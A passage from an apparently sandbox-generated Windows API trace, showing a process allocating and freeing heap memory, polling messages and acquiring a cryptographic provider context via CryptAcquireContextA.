(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0136.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0136.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0136.837] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.837] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0136.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0136.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0136.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0136.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0136.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0136.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0136.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0136.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0136.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0136.840] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0136.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0136.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0136.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0136.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0136.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0136.841] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0136.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b28 [0136.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0136.842] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0136.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0136.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0136.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0136.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0136.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0136.843] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0136.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0136.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0136.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0136.846] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0136.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0136.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0136.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.847] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0136.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0136.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 